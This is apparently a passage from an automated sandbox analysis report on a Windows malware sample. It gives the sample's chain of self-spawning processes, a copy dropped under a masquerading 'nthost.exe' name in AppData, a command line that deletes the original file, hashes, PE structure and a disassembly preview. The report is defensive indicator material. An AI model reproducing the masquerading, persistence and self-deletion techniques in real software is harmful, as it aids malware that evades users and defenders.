                                        • obtG43AWHP.exe (PID: 3412 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 8 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                          • obtG43AWHP.exe (PID: 3424 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 9 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                            • obtG43AWHP.exe (PID: 3440 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 9 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                              • obtG43AWHP.exe (PID: 3452 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 10 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                • obtG43AWHP.exe (PID: 3468 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 10 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                  • obtG43AWHP.exe (PID: 3480 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 11 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                    • obtG43AWHP.exe (PID: 3496 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 11 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                      • obtG43AWHP.exe (PID: 3508 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 12 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                        • obtG43AWHP.exe (PID: 3528 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 12 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                          • obtG43AWHP.exe (PID: 3540 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 13 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                            • obtG43AWHP.exe (PID: 3560 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 13 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                              • obtG43AWHP.exe (PID: 3572 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 14 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                • obtG43AWHP.exe (PID: 3592 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 14 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                  • obtG43AWHP.exe (PID: 3604 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 15 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                    • obtG43AWHP.exe (PID: 3620 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 15 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                      • obtG43AWHP.exe (PID: 3632 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 16 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                        • obtG43AWHP.exe (PID: 3652 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 16 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                          • nthost.exe (PID: 3672 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                            • nthost.exe (PID: 3696 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
  • explorer.exe (PID: 3688 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
MD5:1DE07D0AF66CFA7B504C2F563D45437B
SHA1:B340C407A3D703E412C18DDC7FFDE70B3DF932DF
SHA-256:D819B9EBF5C342289ABC3CE17A365A50C84616C46A01B7A0B90A1C5F41277DE0
SHA-512:85BE784A3F2AA0C8A311493F02859B6E8EF51F6294BFCA83027F1BCDD3EB5A59EC3718B9E8E281BD1C2BDBA36809B4853ADA998B5F37BF88E7DB48FF4A118AFE
Malicious:true
Antivirus:
  • Antivirus: virustotal, Detection: 46%, Browse
C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe:Zone.Identifier
File Type:ASCII text, with CRLF line terminators
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Java Script embedded in Visual Basic Script (1500/0) 0.01%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:obtG43AWH.exe
File size:498176
MD5:1de07d0af66cfa7b504c2f563d45437b
SHA1:b340c407a3d703e412c18ddc7ffde70b3df932df
SHA256:d819b9ebf5c342289abc3ce17a365a50c84616c46a01b7a0b90a1c5f41277de0
SHA512:85be784a3f2aa0c8a311493f02859b6e8ef51f6294bfca83027f1bcdd3eb5a59ec3718b9e8e281bd1c2bdba36809b4853ada998b5f37bf88e7db48ff4a118afe
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v.j[v.j[v.j[...[`.j[...[x.j[...[..j[...[..j[v.k[ .j[...[w.j[...[w.j[...[w.j[Richv.j[................PE..L....0.Y...........

File Icon

Static PE Info

General

Entrypoint:0x3002e81
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x3000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x598830C8 [Mon Aug 7 09:20:08 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:5b44ece315e26b140629a3666ae6a98c

Entrypoint Preview

Instruction
call 00007F53A0F54F3Eh
jmp 00007F53A0F52A2Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F53A0F55B58h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F53A0F52BB9h
call 00007F53A0F53B9Fh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F53A0F52CD4h
test al, 40h
je 00007F53A0F52BAFh
call 00007F53A0F53B84h
mov dword ptr [eax], 00000022h
jmp 00007F53A0F52B85h
push ebx
xor ebx, ebx
test al, 01h
je 00007F53A0F52BB8h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F53A0F52C2Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F53A0F52BCEh
call 00007F53A0F55935h
add eax, 20h
cmp esi, eax
je 00007F53A0F52BAEh
call 00007F53A0F55929h
add eax, 40h
cmp esi, eax
jne 00007F53A0F52BAFh
push dword ptr [ebp+0Ch]
call 00007F53A0F558C4h
pop ecx
test eax, eax
jne 00007F53A0F52BA9h
push esi
call 00007F53A0F55870h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F53A0F52C26h
mov eax, dword ptr [esi+08h]

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x9a9c0x64.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x6e6e2.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x830000x708.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2b600x40.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x10000x140.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x91e60x9200False0.562018407534data6.38299044249IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data0xb0000x80a00xe00False0.196986607143data2.24335225659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x140000x6e6e20x6e800False0.82630885888data7.96230835772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x830000xd120xe00False0.443917410714data4.1795554597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
BBBAAC0x142d80x583e9data
RT_BITMAP0x6c6c40x32c8data
RT_BITMAP0x6f98c0x3368data
RT_BITMAP0x72cf40x3354data
RT_BITMAP0x760480x35f8data
RT_BITMAP0x796400x3338data
RT_ICON0x7c9780x10a8data
RT_ICON0x7da200x4228dBase IV DBT of \200.DBF, blocks size 64, next free block index 40, 1st item "\015\033\355\375\013\034\353\376\013\033\355\377\013\033\354\375o\031\244\376\316\026_\375\316\025_\376\316\025_\376\316\025_\375\315\025_\375\317\026^\377\315\027]\376\315\027^\375\316\026_\376\315\026_\375\317\025^"
RT_MENU0x81c480x468data
RT_MENU0x820b00x168data
RT_MENU0x822180x4a6data
RT_GROUP_ICON0x826c00x22MS Windows icon resource - 2 icons, 32x32, 256-colors

Imports

DLLImport
KERNEL32.dllGetLastError, VirtualProtect, GetCalendarInfoW, GetLocaleInfoW, GetTickCount, GetPrivateProfileSectionNamesA, LocalAlloc, GetModuleHandleW, FlushFileBuffers, CloseHandle, CreateFileW, HeapSize, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapFree, Sleep, LoadLibraryW, RtlUnwind, SetStdHandle, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeW, HeapAlloc, HeapReAlloc, IsProcessorFeaturePresent
GDI32.dllGetLogColorSpaceA, ChoosePixelFormat, GetColorSpace, SetICMMode
SHELL32.dllExtractIconA, ShellAboutW, ShellExecuteA
WINHTTP.dllWinHttpConnect, WinHttpCloseHandle

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: obtG43AWHP.exe PID: 3072 Parent PID: 2848

General

Start time:19:10:13
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x75a90000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3120 Parent PID: 3072

General

Start time:19:10:17
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3132 Parent PID: 3120

General

Start time:19:10:19
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3156 Parent PID: 3132

General

Start time:19:10:23
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3168 Parent PID: 3156

General

Start time:19:10:23
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3192 Parent PID: 3168

General

Start time:19:10:26
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3204 Parent PID: 3192

General

Start time:19:10:26
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3220 Parent PID: 3204

General

Start time:19:10:29
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3232 Parent PID: 3220

General

Start time:19:10:29
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3248 Parent PID: 3232

General

Start time:19:10:32
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3260 Parent PID: 3248

General

Start time:19:10:32
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3284 Parent PID: 3260

General

Start time:19:10:35
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3296 Parent PID: 3284

General

Start time:19:10:35
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3312 Parent PID: 3296

General

Start time:19:10:38
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3324 Parent PID: 3312

General

Start time:19:10:38
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3340 Parent PID: 3324

General

Start time:19:10:41
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Imagebase:0x74150000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3352 Parent PID: 3340

General

Start time:19:10:41
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3368 Parent PID: 3352

General

Start time:19:10:44
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3380 Parent PID: 3368

General

Start time:19:10:44
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3412 Parent PID: 3380

General

Start time:19:10:47
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Imagebase:0x756e0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3424 Parent PID: 3412

General

Start time:19:10:47
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3440 Parent PID: 3424

General

Start time:19:10:50
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3452 Parent PID: 3440

General

Start time:19:10:50
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3468 Parent PID: 3452

General

Start time:19:10:53
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3480 Parent PID: 3468

General

Start time:19:10:53
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3496 Parent PID: 3480

General

Start time:19:10:56
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3508 Parent PID: 3496

General

Start time:19:10:56
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3528 Parent PID: 3508

General

Start time:19:10:59
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3540 Parent PID: 3528

General

Start time:19:10:59
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3560 Parent PID: 3540

General

Start time:19:11:02
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3572 Parent PID: 3560

General

Start time:19:11:02
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3592 Parent PID: 3572

General

Start time:19:11:05
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3604 Parent PID: 3592

General

Start time:19:11:05
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3620 Parent PID: 3604

General

Start time:19:11:08
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Imagebase:0x753f0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3632 Parent PID: 3620

General

Start time:19:11:08
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: obtG43AWHP.exe PID: 3652 Parent PID: 3632

General

Start time:19:11:11
Start date:08/10/2017
Path:C:\Users\user\Desktop\obtG43AWHP.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Imagebase:0x75a90000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Analysis Process: nthost.exe PID: 3672 Parent PID: 3652

General

Start time:19:11:11
Start date:08/10/2017
Path:C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x73e10000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 46%, virustotal, Browse

Chronological Activities

Analysis Process: explorer.exe PID: 3688 Parent PID: 2820

General

Start time:19:11:14
Start date:08/10/2017
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:explorer.exe C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Imagebase:0x75340000
File size:2972672 bytes
MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: nthost.exe PID: 3696 Parent PID: 3672

General

Start time:19:11:14
Start date:08/10/2017
Path:C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Imagebase:0x753b0000
File size:498176 bytes
MD5 hash:1DE07D0AF66CFA7B504C2F563D45437B
Programmed in:Borland Delphi

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: obtG43AWHP.exe PID: 3072 Parent PID: 2848

    Execution Graph

    Execution Coverage:3.9%
    Dynamic/Decrypted Code Coverage:30.6%
    Signature Coverage:5.8%
    Total number of Nodes:967
    Total number of Limit Nodes:18

    Graph

